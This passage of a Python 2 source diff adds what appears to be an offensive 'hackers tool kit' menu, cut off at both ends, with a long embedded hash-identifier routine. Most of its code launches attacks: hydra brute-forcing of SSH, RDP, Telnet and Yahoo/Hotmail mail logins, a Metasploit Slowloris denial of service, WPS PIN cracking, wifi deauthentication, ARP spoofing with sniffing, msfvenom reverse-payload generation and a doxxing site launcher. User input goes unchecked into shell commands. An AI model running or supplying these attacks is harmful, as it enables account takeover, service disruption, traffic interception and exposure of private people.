word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and 